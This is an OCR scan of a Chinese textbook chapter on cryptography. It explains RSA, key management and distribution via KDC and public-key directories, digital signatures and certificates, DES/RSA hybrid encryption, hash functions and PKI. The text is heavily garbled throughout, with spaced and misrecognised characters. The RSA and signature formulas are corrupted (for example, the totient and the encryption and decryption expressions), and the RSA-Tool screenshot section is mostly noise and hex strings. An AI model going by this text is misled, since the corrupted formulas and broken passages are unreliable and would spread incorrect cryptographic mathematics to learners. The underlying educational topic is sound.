够 大 的 奇 素数 的 函数 ,由 公 钥 和 密 文 恢复 出 明文 的 难度 与 分 解 两 个 足够 大 的 奇 素数 的 乘积 
具有 同等 的 难度 。 

RSA 算法 原理 如 下 。 

(1) 随机 选择 一 对 足够 大 的 奇 素数 为 p 和 9g .而且 保 密 。 

(2) HA n = pq n 公开。 

(3) 计算 nn 的 欧 拉 函 数 $(n) = (y DG7 D 8 $(n) 保 密 。 

CD. 随机 选择 一 个 正 整 数 e, 使 gcd(e,p(z))=1, 将 e 公 开 。 

(5) 满足 dXe = 1 mod $G0 ,计算 d = e! mod $(n), 并 对 d 保密。 

其 中 , 公 钥 K.=={e,n) ASH Ka={p.qsd.ġ(n)}. 

对 明文 块 M 和 密 文 块 C 加 /解密 的 形式 如 下 : 加 密 运 算 为 C — M mod ”解密 运算 为 
M = C! mod n, 

这 里 ,加 密 过 程 和 解密 过 程 需 满足 Dk, (Ex, (M)) =M, R (M= M" = Mr = 
M mod n, 

RSA 密码 算法 , 既 可 用 于 加 密 , 也 可 用 于 数字 签名 ,安全 、 易 懂 , 因 此 ,RSA 密码 已 成 为 
目前 应 用 最 广泛 的 公开 密 钥 密码 。 

RSA 缺点 : 产生 密 钥 麻烦 ,受到 素数 产生 技术 的 限制 ,因而 难以 做 到 一 次 一 密 ; 分 组 长 
度 太 大 ,为 保证 安全 性 ,n 至 少 要 600 位 以 上 ,使 得 运算 代价 很 高 ,尤其 速度 较 慢 ; MEKK 
数 分 解 技 术 的 发 展 ,这 个 长 度 还 在 增加 ,不 利于 数据 格式 的 标准 化 。 由 于 RSA 加 密 算法 在 
nn 增加 后 ,速度 较 慢 ( 一 般 硬 件 实现 DES 比 慢 1500 倍 , 软 件 实现 DES 比 慢 100 倍 ) ,通常 采 
用 的 方法 : 先 用 对 称 密码 算法 对 大 量 用 户 数据 进行 加 密 , 之 后 用 RSA 对 对 称 加 密 算 法 的 密 
钥 进行 加 密 , 最 后 进行 对 称 密 钥 的 传输 和 交换 。 
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3. RSA 软件 工具 
流行 的 经 典 RSA 软件 工具 很 多 ,RSA Tool 演示 加 密 .解密 效果 如 图 4-7 所 示 。 


© RSA-Tool 2 by tE! 


Keysize (Bts) REM (E) -, j Number Base 


002243F9C32366F53B5AF8466164F98864DEC5A11C1F669614F393E6813E80126CACB09241C2087 
|E365D17B7A06F038C7D25AF4FD76A262763DD6E5FF23E0DE3 


Prime (OY 


8D56819664A3039148D727D9F27A70AACEB2C7FC6042702CB38459F0C0B11268254262F63FE74E64 
-1FD611A7BBCSF9D12351007EBTBDSCD41CED64151748CCB0B 
Modulus (NY Exact size: 1024 
'9B0E17FA17033E288B4F53DAB360771 3095F 4606834068281855597 381764283730 A 
599686B489F: 


99F0EC865AC: 
A6497C171771406874CC30EAFF5255F3E6F10EBA1A0591E18C88002929E46E36F 
01282DF68153E04CF199FDC761C44CEDD1D4CCD1D30COF606606FF54241C38454414F6E3664C8C26 国 


47839CFA1464618115DCB6271FFF627EBF6C0E7955EE955561263 E] 
A3700DCE60976ACC5647A7 


La] [T Use MPOS method ony [^ No tme checks 


Done. You can test your keys right now. 


jiqaz2wsx3edc4rfivStgb6yhn7ujmaik Sol 0p. Te] 
Max. length (chars) of message cen be (Keysize8)-1, to make sure that M< N. 
-Resut 
33A59066153EBE614E30F68093540306709653445C023D5ACE6600776 国 


0993F1EA5E002F 2523EBBE49685B10053530500BCDD9E4A129665DBF1 阅 


[Ert] | perit Cancel 


Message encrypted: C-M^E MOD II. You may press Decrypt now. 


en 


图 4-7 RSA Jn ét fit a CR IG 


4.1.7. 密 钥 的 管理 和 分 配 


在 采用 密码 技术 保护 的 现代 通信 系统 中 ,密码 算法 通常 是 公开 的 ,因此 其 安全 性 就 取决 
于 对 密 钥 的 保护 。 密 钥 生成 算法 的 强度 、 密 钥 的 长 度 . 密 钥 的 保密 和 安全 管理 是 保证 系统 安 
全 的 重要 因素 。 

密 钥 管理 的 任务 就 是 管理 密 钥 的 产生 到 销毁 全 过 程 , 包 括 系统 初始 化 , 密 钥 的 产生 、 存 
储 、 备 份 , 恢 复 、 装 入、 分 配 ,保护 、 更 新 ,控制 .丢失 ,吊销 和 销毁 等 。 所 有 密 钥 都 有 生命 周期 ， 
这 是 因为 拥有 大 量 的 密 文 有 助 于 密码 分 析 。 一 个 密 钥 使 用 时 间 太 长 ,为 攻击 者 收集 大 量 密 
文 提供 了 机 会 。 破 译 一 个 密 钥 需要 时 间 , 限 制 密 钥 的 使 用 时 间 也 就 限制 了 密 钥 的 破译 时 间 ， 
降低 了 密 钥 被 破译 的 可 能 性 。 从 网 络 应 用 来 看 , 密 钥 一 般 分 为 基本 密 钥 、 会 话 密 钥 、. 密 钥 加 
密 密 钥 和 主机 密 钥 等 。 

基本 密 钥 又 称 初始 密 钥 ,是 由 用 户 选 定 或 由 系统 分 配 ,可 在 较 长 时 间 内 由 一 对 用 户 专门 
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使 用 的 秘密 密 钥 ,也 称 用 户 密 钥 ;基本 密 钥 既 要 安全 ,又 要 便于 更 换 。 会 话 密 钥 即 两 个 通信 
终端 用 户 在 一 次 通话 或 交换 数据 时 所 用 的 密 钥 。 密 钥 加 密 密 钥 是 对 传送 的 会 话 或 文件 密 钥 
进行 加 密 时 采用 的 密 钥 ,也 称 为 次 主 密 钥 辅助 密 钥 或 密 钥 传送 密 钥 。 每 个 节点 都 分 配 有 一 
个 这 类 密 钥 ,为 了 安全 ,各 节点 的 密 钥 加 密 密 钥 应 该 互 不 相同 。 主 机 密 钥 是 对 密 钥 加 密 密 钥 
进行 加 密 的 密 钥 , 存 于 主机 处 理 器 中 。 

密 钥 长 度 的 选择 与 具体 的 应 用 有 关 , 密 钥 长 度 和 每 秒 可 实现 的 搜索 密 钥 数 决定 了 密码 
体制 的 安全 性 。 目 前 ,长 度 在 128 位 以 上 的 密 钥 才 是 安全 的 。 


1. 密 钥 的 产生 


密 钥 的 产生 必须 考虑 具体 密码 体制 的 公认 的 限制 。 在 网 络 系 统 中 加 密 需要 大 量 的 密 
钥 , 以 分 配给 各 主机 、 节 点 和 用 户 。 可 以 用 手工 的 方法 ,也 可 以 用 密 钥 产生 器 产生 密 钥 。 基 
本 密 钥 是 控制 和 产生 其 他 加 密 密 钥 的 密 钥 ,而且 长 度 不 变 ,其 安全 性 非常 关键 ,须要 保证 其 
完全 随机 性 ,不 可 重复 性 和 不 可 预测 性 。 基 本 密 钥 量 小 ,可 以 用 掷 硬币 等 方法 产生 。 密 钥 加 
密 密 钥 可 以 用 伪 随 机 数 产生 器 ,安全 算法 等 产生 。 会 话 密 钥 ,数据 加 密 密 钥 可 在 密 钥 加 密 密 
钥 控 制 下 通过 安全 算法 产生 。 


2. 对称 密码 体制 的 密 钥 分 配 


任何 密码 系统 的 强度 都 依赖 于 密 钥 分 配 技术 , 密 钥 分 配 研究 密码 系统 中 密 钥 的 分 发 和 
传送 中 的 问题 。 对 称 密码 的 密 钥 分 配 的 方法 归纳 起 来 有 两 种 : 利用 公 钥 密码 体制 实现 和 利 
用 安全 信道 实现 。 在 局 部 网 络 中 ,每 对 用 户 可 以 共享 一 个 密 钥 , 即 无 中 心 密 钥 分 配方 式 ,如 
图 4-8 所 示 。 

两 个 用 户 A 和 B 要 建立 会 话 密 钥 , 需 经 过 以 下 3 个 步骤 。 

(1) A 向 B 发 出 建立 会 话 密 钥 的 请 求 和 一 个 一 次 性 随机 数 Ni 。 

(2) BHS A 共享 的 主 密 钥 对 应 答 的 消息 加 密 , 并 发 送 给 A, 应 答 的 消息 中 包括 了 选取 
的 会 话 密 钥 B 的 身份 .F(CNi) 和 另 一 个 一 次 性 随机 数 N; 。 

(3) A 用 新 建立 的 会 话 密 钥 加 密 /Na ) 并 发 送 给 B。 

在 大 型 网 络 中 ,不 可 能 每 对 用 户 共享 一 个 密 钥 。 因 此 采用 中 心 化 密 钥 分 配方 式 ,由 一 个 
可 信赖 的 联机 服务 器 作为 密 钥 分 配 中 心 (KDC) 来 实现 。 图 4-9 所 示 为 中 心 化 密 钥 管理 方式 
的 一 个 实例 。 
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图 4-8 无 中 心 密 钥 分 配方 式 图 4-9 中 心 化 密 钥 分 配方 式 
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用 户 A 和 B 要 建立 共享 密 钥 ,可 以 采用 如 下 5 个 步骤 。 

O) A 向 KDC 发 出 会 话 密 钥 请 求 。 该 请 求 由 两 个 数据 项 组 成 ,一 个 是 A 与 B 的 身份 ， 
另 一 个 是 一 次 性 随机 数 Ni 。 

(2) KDC 为 A 的 请 求 发 出 应 答 。 应 答 是 用 A 与 KDC 的 共享 主 密 钥 加 密 的 ,因而 只 有 
A 能 解密 这 一 消息 ,并 确信 消息 来 自 KDC。 消 息 中 包含 A 希望 得 到 的 一 次 性 会 话 密 钥 K 
以 及 A 的 请 求 ,还 包括 一 次 性 随机 数 N;。 因 此 A 能 验证 自己 的 请 求 有 没有 被 自 改 ,并 能 通 
过 一 次 性 随机 数 N; 得 知 收 到 的 应 答 是 不 是 过 去 应 答 的 重 放 。 消 息 中 还 包含 A 要 转发 给 B 
的 部 分 ,这 部 分 包括 一 次 性 会 话 密 钥 Ks 和 A 的 身份 ,它们 是 用 也 与 KDC 的 共享 主 密 钥 加 
密 的 。 

G) A 存储 会 话 密 钥 ,并 向 B 转发 从 KDC 的 应 答 中 得 到 的 应 该 转发 给 B 的 部 分 。B 收 
到 后 ,可 得 到 会 话 密 钥 Ks A 的 身份 得 知 会 话 的 另 一 方 为 A。 

(4) B 用 会 话 密 钥 Ks 加 密 另 一 个 一 次 性 随机 数 N: ,并 将 加 密 结果 发 送 给 A。 

© A 用 会 话 密 钥 Ks WME SON) ,并 将 加 密 结果 发 送 给 B. 

应 当 注意 前 三 步 已 完成 密 钥 的 分 配 ,后 两 步 结 合 第 二 和 第 三 步 完 成 认证 功能 。 


3. 公 钥 密码 体制 的 密 钥 分 配 


公 钥 密码 体制 的 一 个 重要 用 途 就 是 分 配对 称 密码 体制 使 用 的 密 钥 ,由 于 公 钥 加 密 速度 
太 慢 ,常常 只 用 于 加 密 分 配对 称 密码 体制 的 密 钥 ,而 不 用 于 保密 通信 。 常 用 的 公 钥 分 配方 
法 : 公开 发 布 , 公 钥 动态 目录 表 、 公 钥 证 书 。 

(1) 公开 发 布 。 用 户 将 自己 的 公 钥 发 给 所 有 其 他 用 户 或 向 某 一 团体 广播 。 这 种 方法 简 
单 , 但 有 一 个 非常 大 的 缺陷 ,就 是 别人 能 容易 地 伪造 这 种 公开 的 发 布 。 

(2) 公 钥 动态 目录 表 。 建 立 一 个 公用 的 公 钥 动态 目录 表 , 表 的 建立 和 维护 以 及 公 钥 的 
分 布 由 某 个 公 钥 管理 机 构 承担 ,每 个 用 户 都 知道 管理 机 构 的 公 钥 ,如 图 4-10 所 示 。 


管理 机 构 


ij 8 
CNN 


图 4-10 公 钥 动态 目录 表 模 型 


公 钥 的 分 配 步骤 如 下 。 

(D 用 户 A 向 公 钥 管理 机 构 发 送 一 带 时 戳 的 请 求 , 请 求 得 到 用 户 B 当前 的 公 铀 。 

@ 管理 机 构 为 A 的 请 求 发 出 应 答 ,应 答 中 包含 B 的 公 钥 以 及 A 向 公 钥 管理 机 构 发 送 
的 带 时 戳 请 求 。 

@A 用 了 的 公 钥 加 密 一 个 消息 并 发 送 给 B, 这 个 消息 由 A 的 身份 和 一 个 一 次 性 随机 数 
Ni 组 成 。 

OBHS A 同样 的 方法 从 公 铀 管理 机 构 得 到 A 的 公 钥 。 


第 4 章 “” 公 和 钥 基 础 设施 


© B 用 人 A 的 公 钥 加 密 一 个 消息 并 发 送 给 A, 这 个 消息 由 Ni 和 Ns 组 成 。 这 里 的 N 是 
B 产 生 的 一 个 一 次 性 随机 数 。 

© A 用 B 的 公 钥 加 密 N;, 并 将 加 密 结果 发 送 给 B。 由 于 每 一 用 户 要 想 与 他 人 通信 都 
要 求助 于 公 钥 管理 机 构 , 因 而 公 钥 管理 机 构 有 可 能 成 为 系统 的 瓶颈 ,而 且 公 钥 目录 表 也 容易 
被 串扰 。 分 配 公 钥 的 一 种 安全 有 效 的 方法 是 采用 公 钥 证 书 ,用 户 通 过 公 钥 证 书 相互 交换 自 
己 的 公 钥 而 无 须 与 公 钥 机 构 联系 。 

(3) 公 钥 证 书 。 公 钥 证 书 由 证 书 管理 机 构 CA 为 用 户 建立 ,其 中 的 数据 项 有 该 用 户 的 
公 钥 .用户 的 身份 和 时 截 等 。 所 有 的 数据 经 CA 签字 后 就 形成 证 书 , 证 书 中 可 能 还 包括 一 些 
辅助 信息 ,如 公 钥 使 用 期 限 . 公 钥 序 列 号 或 识别 号 .采用 的 公 钥 算法 、 使 用 者 的 住址 或 网 
址 等 。 


4.1.8 加 密 技术 的 应 用 


信息 加 密 、 认 证 和 签名 是 保护 信息 的 机 密 性 、 完 整 性 和 抗 否认 性 的 主要 技术 措施 ,也 是 
加 密 技术 的 重要 应 用 。 下 面 讲述 数字 签名 与 数字 证 书 。 


1. 数字 签名 


数字 签名 可 以 防止 通信 双方 中 的 一 方 对 另 一 方 的 欺骗 。 例 如 ,A 与 B 使 用 消息 认证 进 
行 通信 ,A 伪造 一 个 消息 并 使 用 与 B 共享 的 密 钥 产生 该 消息 的 认证 码 , 然 后 声称 该 消息 来 
WT B: 同样 ,B 也 可 以 对 自己 发 送 给 A 的 消息 予以 否认 。 因 此 ,除了 认证 之 外 还 需要 其 他 
机 制 来 防止 通信 双方 的 抵赖 行为 ,最 常见 的 方案 是 数字 签名 。 

目前 的 数字 签名 体制 大 致 可 以 分 成 两 类 : 直接 数字 签名 和 需 仲裁 的 数字 签名 。 

D 直接 数字 签名 。 直 接 数字 签名 仅 涉及 通信 方 , 它 假 定 接收 方 知道 发 送 方 的 公开 密 
钥 。 数 字符 名 通过 使 用 发 送 方 的 私有 密 钥 对 整个 消息 进行 加 密 和 使 用 发 送 方 的 私有 密 钥 对 
消息 的 散 列 密码 进行 加 密 来 产生 。 

(2) 需 仲裁 的 数字 签名 。 需 仲裁 的 数字 签名 体制 的 一 般 流 程 如 下 : 发 送 方 A 对 消息 签 
名 后 ,将 附 有 签名 的 消息 发 送 给 仲裁 者 C,C 对 其 验证 后 ,连同 一 个 通过 验证 的 证 明 发 送 给 
接收 方 B。 在 这 个 方案 中 ,A 无 法 对 自己 发 出 的 消息 予以 否认 ,但 仲裁 者 必须 是 得 到 所 有 用 
户 信任 的 负责 任 者 。 

需要 仲裁 的 数字 签名 可 以 解决 直接 数字 签名 方案 的 有 效 性 依赖 于 发 送 方 私有 密 钥 的 安 
全 性 问题 。 


2. 数字 证 书 


数字 证 书 也 称 为 数字 ID, 是 一 种 权威 性 的 电子 文档 ,由 一 对 密 钥 ( 公 钥 和 私 钥 ) 和 用 户 
信息 等 数据 共同 组 成 ,在 网 络 中 充当 一 种 身份 证 ,用 于 证 明 某 一 实体 (如 组 织 机 构 ,用户 等 ) 
的 身份 ,公告 该 主体 拥有 的 公 钥 的 合法 性 。 

数字 证 书 采用 公 钥 密码 机 制 , 即 利用 一 对 互相 匹配 的 密 钥 进行 加 密 .解密 。 每 个 用 户 拥 
有 一 个 仅 为 自己 掌握 的 私 钥 , 用 它 进行 解密 和 签名 ,同时 拥有 一 个 可 以 对 外 公开 的 公 钥 ,用 
于 加 密 和 验证 签名 。 当 发 送 一 份 保密 文件 时 ,发送 方 使 用 接收 方 的 公 钥 对 数据 加 密 ,而 接收 
方 则 使 用 自己 的 私 钥 解 密 , 这 样 ,信息 就 可 以 安全 地 传送 了 。 常 见 的 数字 证 书 有 以 下 几 种 。 
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(D Web 服务 器 证 书 。 用 于 在 Web 服务 器 与 用 户 浏览 器 之 间 建 立 安全 连接 通道 。 

(2) 服务 器 身份 证 书 。 提 供 服 务 器 信息 、 公 钥 及 CA 的 签名 ,用 于 在 网 络 中 标识 服务 器 
软件 的 身份 ,确保 与 其 他 服务 器 或 用 户 通信 的 安全 性 。 

O 计算 机 证 书 。 颁 发 给 计算 机 ,提供 计算 机 本 身 的 身份 信息 ,确保 与 其 他 计算 机 通信 
的 安全 性 。 

(4) 个 人 证 书 。 提 供 证 书 持 有 者 的 个 人 身份 信息 、 公 钥 及 CA 的 签名 ,用 于 在 网 络 中 标 
识 证 书 持 有 人 个 人 身份 。 

(5) 安全 电子 邮件 证 书 。 提 供 证 书 持 有 者 的 电子 邮件 地 址 、 公 钥 及 CA 的 签名 ,用 于 邮 
件 的 安全 传递 和 认证 。 

(6) 企业 证 书 。 提 供 企 业 身 份 信息 AHR CA 的 签名 ,用 于 在 网 络 中 标识 证 书 持 有 企 
业 的 身份 。 

(7) 代码 签名 证 书 。 软 件 开发 者 借助 数字 签名 技术 来 保证 用 户 使 用 的 软件 是 该 作者 编 
写 的 。 

查看 证 书 的 方法 是 : 打开 TE 浏览 器 ,选择 “工具 ”~>Internet 命令 ,打开 “Internet 选项 ” 
对 话 框 ; 选择 “内容 ”选项 卡 , 然 后 单 击 "证 书 ” 按 钮 ,打开 “证 书 ” 对 话 框 ; 选择 * 受 信任 的 根 
证 书 颁发 机 构 ” 选 项 卡 ,可 以 找到 受信 任 机 构 颁 发 的 CA 数字 证 书 ,如 图 4-11 所 示 。 

选择 某 一 数字 证 书后 , 单 击 “ 查 看 ”按钮 ,可 以 查看 该 证 书 当前 的 信息 ,如 图 4-12 所 示 ; 
单 击 “导出 ?按钮 ,可 以 导出 现 有 的 数字 证 书 并 保存 ; 单 击 * 导 入 "按钮 ,可 以 导入 已 存储 的 数 
字 证 书 。 


7S | 详细 信息 | 证 书 路 径 | 
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图 4-11 管理 数字 证 书 图 4-12 查看 数字 证 书 


4.1.9 DES 和 RSA 混 合 加 解密 
1. DES 加 密 数据 .RSA 加 密 DES 的 密 钥 


DES 算法 是 经 典 的 对 称 密码 体制 ,主要 用 于 加 密 大 量 数据 ; RSA 是 经 典 的 非 对 称 密码 体 
制 ,主要 用 于 加 密 小 量 数 据 ,如 加 密 对 称 密码 密 钥 。DES 和 RSA 混合 加 解密 如 图 4-13 所 示 。 
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图 4-13 DES 和 RSA 混合 加 解密 


加 密 过 程 包括 如 下 5 个 步骤 : 发 送 方 随 机 产生 一 个 对 称 密 钥 (DES) ; @ 发 送 方 用 
对 称 密 钥 加 密 要 发 送 的 明文 (DATA); @ 发 送 方 接受 对 端 发 送 过 来 的 公 钥 (RSA); OR 
送 方 用 公 钥 (RSA) 对 对 称 密 钥 (DES) 进行 加 密 ; @ 发 送 方 将 加 密 后 的 密 钥 和 密 文 打包 ， 
发 出 。 

解密 过 程 包括 如 下 三 个 步骤 : 〇 接收 方 接收 对 端 发 送 过 来 的 数据 包 ; 加 接收 方 用 私 钥 
对 发 送 方 加 密 的 对 称 密 钥 进行 解密 ,获得 发 送 方 的 对 称 密 钥 ; @ 接 收 方 用 对 称 密 钥 解 密 密 
文 (byte) ,获得 发 送 方 的 明文 。 


2. 哈 希 单 向 散 列 函数 


哈 希 单 向 散 列 函数 昌 (M) 作 用 于 一 个 任意 长 度 的 消息 M, 它 返回 一 个 固定 长 度 的 散 列 
值 h, 其 中 及 的 固定 长 度 为 m, 通 常 输出 长 度 远 小 于 输入 长 度 。 

哈 希 单 向 散 列 函数 的 基本 特性 为 : 输入 为 任意 长 度 且 输出 为 固定 长 度 ; @ 给 定 M. 
REDHA h: GE hdi HM) = h HAM 很 难 ; @ 给 定 M, 要 找到 另 一 个 消息 M 
iig HOM) = HOMO 很 难 。 第 @、@ 特 性 ,体现 了 哈 希 函数 的 单 向 性 。 

哈 希 散 列 函数 算法 主要 用 于 认证 ,数字 签名 等 应 用 中 。 图 4-14 所 示 为 介绍 哈 希 函数 用 
于 消息 完整 性 认证 。 
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假设 消息 为 M, 散 列 值 为 HOM) ,加 密 CM 十 HOVDO RU EC. X «Ak X 到 接收 端 ; 接收 
端 解 密 X IRE M A HM) ,重新 计算 M 的 散 列 值 HM), WR H' (OM) — HCVD ,说 明 消 
息 M 在 传输 过 程 中 没有 被 破坏 。 利 用 哈 希 函数 ,消息 M 的 完整 性 得 到 了 验证 。 

常见 哈 希 单 向 散 列 函数 ; MD5 (message digest algorithm 5) 是 RSA 数据 安全 公司 开发 
的 一 种 单 向 散 列 算法 ,可 以 用 来 把 不 同 长 度 的 数据 块 进行 暗 码 运 算 成 一 个 128 位 的 数值 。 
SHA(secure Hash algorithm) 是 一 种 较 新 的 散 列 算法 ,可 以 对 任意 长 度 的 数据 运算 生成 一 
个 160 位 的 数值 。MAC(message authentication code, 消 息 认 证 代码 ) 是 一 种 使 用 密 钥 的 单 


图 4-14 哈 希 消息 完整 性 认证 


向 函数 ,可 以 用 在 系统 上 或 用 户 之 间 认 证 文件 或 消息 。 


3. 数字 签名 


传统 对 称 密码 的 加 密 速度 快 ,主要 用 于 数据 加 密 ; 公 钥 密码 速度 慢 , 主 要 用 于 数字 签 


名 ,或 用 于 保护 对 称 密码 的 密 钥 


RSA 公 钥 算法 可 用 于 数字 签名 ,其 公 钥 K。 和 私 钥 Ka 都 可 用 做 加 密 ; 用 私 钥 Ka 加 密 ， 
HAH K. 解密 ,这 个 过 程 称 做 数字 签名 。 因 为 , 私 钥 是 私人 的 ,只 有 持 有 者 知道 ; 公 钥 是 公 
开 的 ,大 家 都 可 以 知道 ; 私 钥 Ka 持 有 者 加 密 数 据 , 只 有 他 本 人 拥有 私 钥 ,这样 私 钥 持 有 者 实 


现 了 对 数据 的 私人 签名 。 


数字 签名 过 程 包含 签名 过 程 和 验证 过 程 (也 称 识别 过 程 ): 假设 ,明文 M, 密 文 C, 公 钥 
K。, 私 钥 Ku。 签名 过 程 ( 私 钥 加 密 ): Di, (MD 二 C。 验 证 过 程 ( 公 钥 解 密 ): Ex (CO) M. 
一 般 情况 下 ,数字 签名 需要 公开 密码 系统 和 散 列 技术 组 合 应 用 。 图 4-15 所 示 为 数字 签 


名 过 程 。 


假设 明文 消息 M , 密 文 消息 C, Alice 公 钥 K.、 私 钥 Ka , 散 列 摘要 HM). 

签名 过 程 : DAlice 对 消息 M 的 散 列 摘要 签名 D, (HCMD); @Alice 把 Dx, CHOM))--M 
发 送 给 接收 端 Bob。 验 证 过 程 : Bob 收 到 D, (H(M)) - M. HE. Dr, (H(M)) 和 M; 
Q) Bob 用 Alice 的 公 钥 K. 解密 E, CD, CHCVD D ,获得 Alice 的 HOM) ,Bob 重新 计算 消息 


M HRAN H’ (M) ,如 果 H'C) = HOD ,消息 M 是 完整 的 。 
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图 4-15 数字 签名 过 程 


4.2 PKI 技术 


公 钥 基础 设施 (public key infrastructure,PKI) 是 一 套 基于 公 钥 加 密 技 术 ,为 电子 商务 、 
电子 政务 等 提供 安全 服务 的 技术 和 规范 。 作 为 一 种 基础 设施 ,PKI 由 公 钥 技术 ,数字 证 书 、 
证 书 发 放 机 构 和 关于 公 钥 的 安全 策略 等 基本 成 分 共同 组 成 ,用 户 保证 网 络 通信 和 网 上 交易 
的 安全 。 

从 广义 上 讲 , 所 有 提供 公 钥 加 密 和 数字 签名 服务 的 系统 都 可 称 为 PKI 系 统 。PKI 的 主 
要 目的 是 自动 管理 密 钥 和 数字 证 书 ,为 用 户 建立 一 个 安全 的 网 络 运行 环境 ,使 用 户 可 以 在 多 
种 应 用 环境 下 方便 地 使 用 加 密 和 数字 签名 技术 。 


4.2.1 公 钥 基础 设施 简介 


1. PKI 的 定义 


公 钥 基础 设施 (public key infrastructure,PKI) 是 利用 公 钥 理论 和 技术 建立 的 提供 信息 
安全 服务 的 基础 设施 。 公 钥 体 制 是 目前 应 用 最 广泛 的 一 种 加 密 体 制 , 在 这 一 体制 中 ,加密 密 
钥 与 解密 密 钥 各 不 相同 ,发 送信 息 的 人 利用 接收 者 的 公 钥 发 送 加 密 信息 ,接收 者 再 利用 自己 
专 有 的 私 钥 进 行 解密 。 这 种 方式 保证 了 信息 的 机 密 性 、 不 可 抵赖 性 。 公 和 钥 体制 主要 用 于 
CA 认证 ,数字 签名 和 密 钥 交换 等 。 

PKI 是 基于 公开 密 钥 理 论 和 技术 建立 起 来 的 安全 体系 、 提 供 信息 安全 服务 的 具有 普 适 
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性 的 安全 基础 设施 ; 该 体系 在 统一 的 安全 认证 标准 和 规范 基础 上 提供 在 线 身份 认证 ,是 CA 
认证 ,数字 证 书 、 数 字 签 名 以 及 相关 安全 应 用 组 件 模块 的 集合 ; PKI 是 认证 、 完 整 性 ,机密 性 
和 不 可 否认 性 的 技术 基础 ,从 技术 上 解决 网 上 身份 认证 、 信 息 完整 性 和 抗 抵赖 等 安全 问题 ， 
为 网 络 应 用 提供 可 靠 的 安全 保障 。PKI 的 核心 是 解决 信息 网 络 空间 中 的 信任 问题 ,确定 信 
息 网 络 空间 中 各 种 主体 身份 的 唯一 性 真实 性 和 合法 性 ,保护 信息 网 络 空间 中 各 种 主体 的 安 
全 利益 。 

PKI 是 信息 安全 基础 设施 的 一 个 重要 组 成 部 分 ,是 一 种 普遍 适用 的 网 络 安全 基础 设施 ， 
授权 管理 基础 设施 .可 信和 时 间 戳 服务 系统 .安全 保密 管理 系统 .统一 的 安全 电子 政务 平台 等 
的 构筑 都 离 不 开 它 的 支持 。 数 字 证 书 认 证 (CA) 中 心 . 审 核 注 册 (registration authority. 
RA) 中 心 ` 密 钥 管理 (key manager, KM) 中 心 都 是 组 成 PKT 的 关键 组 件 。 


tm 


2. PKI 的 内 容 


PKI 是 以 公开 密 钥 技 术 为 基础 ,以 数据 的 机 密 性 、 完 整 性 和 不 可 抵赖 性 为 安全 目的 而 构 
建 的 认证 ,授权 、 加 密 等 硬件 、 软 件 的 综合 设施 。 根 据 美国 国家 标准 技术 局 的 描述 ,在 网 络 通 
信和 网 络 交易 中 ,特别 是 在 电子 政务 和 电子 商务 业务 中 ,最 需要 的 安全 保证 包括 四 个 方面 ; 
身份 标识 和 认证 、 保 密 或 隐私 ,数据 完整 性 和 不 可 否认 性 。 

PKI 可 以 完全 提供 以 上 四 个 方面 的 保障 , 它 所 提供 的 服务 主要 包括 以 下 三 个 方面 。 

COD 认证 。 在 现实 生活 中 ,认证 方式 通常 是 两 个 人 事前 协商 ,确定 一 个 秘密 ,依据 这 个 
秘密 相互 认证 。 随 着 网 络 规模 的 扩大 ,两 两 协商 几乎 不 可 能 ; 透 过 一 个 密 钥 管理 中 心 来 协 
调 困 难 也 会 很 大 , 当 网 络 规模 巨大 时 , 密 钥 管理 中 心 成 为 网 络 通信 的 瓶颈 。PKI 通过 证 书 进 
行 认证 ,认证 时 对 方 知道 你 就 是 你 ,但 无 法 知道 你 为 什么 是 你 。 在 这 里 ,证 书 是 一 个 可 信 的 
第 三 方 证 明 , 通 过 它 , 通 信 双 方 可 以 安全 地 进行 互相 认证 ,而 不 用 担心 对 方 是 假冒 的 。 

(2) 支持 密 钥 管理 。 通 过 加 密 证 书 ,通信 双方 可 以 协商 一 个 秘密 ,而 这 个 秘密 可 以 作为 
通信 加 密 的 密 钥 。 在 需要 通信 时 ,可 以 在 认证 的 基础 上 协商 一 个 密 钥 。 在 大 规模 的 网 络 中 ， 
密 钥 恢复 也 是 密 钥 管理 的 一 个 重要 方面 。PKI 提供 可 信 的 、 可 管理 的 密 钥 恢 复 机 制 ,PKI 在 
全 社会 范围 内 提供 全 面 的 密 钥 恢复 与 管理 能 力 ,保证 网 上 活动 的 健康 有 序 发 展 。 

G) 完整 性 与 不 可 否认。 完整 性 与 不 可 否认 是 PKI 提供 的 最 基本 的 服务 。PKI 提供 的 
完整 性 是 可 以 通过 第 三 方 仲裁 的 ,并 且 这 种 由 第 三 方 进行 仲裁 的 完整 性 是 通信 双方 都 不 可 
否认 的 。 不 可 否认 是 通过 PKI 的 数字 签名 机 制 来 提供 服务 的 , 当 法 律 许可 时 ,该 “不 可 否认 
性 ”可 以 作为 法 律 依据 。 正 确 使 用 时 ,PKI 的 安全 性 应 该 高 于 目前 使 用 的 纸 面 图 章 系统 。 


3. PKI 的 体系 结构 


一 个 标准 的 PKI 系 统 必须 具备 以 下 主要 内 容 。 

COD 认证 机 构 (certificate authority, CA) J& PKI 的 核心 执行 机 构 , 是 PKI 的 主要 组 成 部 
分 ,通常 称 为 认证 中 心 。CA 还 包括 RA, 它 是 数字 证 书 的 申请 注册 .证 书签 发 和 管理 机 构 。 

CA 的 主要 职责 如 下 。 

O 验证 并 标识 证 书 申请 者 的 身份 ; 对 证 书 申请 者 的 信用 度 、 申 请 证 书 的 目的 ,身份 的 
真实 可 靠 性 等 问题 进行 审查 ,确保 证 书 与 身份 绑 定 的 正确 性 。 

@ 确保 CA 用 于 签名 证 书 的 非 对 称 密 钥 的 质量 和 安全 性 。 为 了 防止 被 破译 ,CA 用 于 
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签名 的 私 钥 长 度 必 须 足 够 长 并 且 私 钥 必须 由 硬件 卡 产生 , 私 钥 不 出 卡 。 

G 管理 证 书信 息 资料 。 管 理 证 书 序号 和 CA 标识 ,确保 证 书 主体 标识 的 唯一 性 ,防止 
证 书 主体 名 字 的 重复 。 在 证 书 使 用 中 确定 并 检查 证 书 的 有 效 期 ,保证 不 使 用 过 期 或 已 作废 
的 证 书 , 确 保 网 上 交易 的 安全 。 发 布 和 维护 作废 证 书 列表 (CRL) , 因 某 种 原因 证 书 要 作废 ， 
就 必须 将 其 作为 “ 黑 名 单 " 发 布 在 证 书 作废 列表 中 ,以 供 交易 时 在 线 查询 ,防止 交易 风险 。 对 
已 签发 证 书 的 使 用 全 过 程 进行 监视 跟踪 , 作 全 程 日 志 记录 ,以 备 发 生 交 易 争 端 时 ,提供 公正 
依据 ,参与 仲裁 。 

由 此 可 见 ,CA 是 保证 电子 商务 、 电 子 政务 、 网 上 银行 .网 上 证 券 等 交易 的 权威 性 、 可 信 
任性 和 公正 性 的 第 三 方 机 构 。 

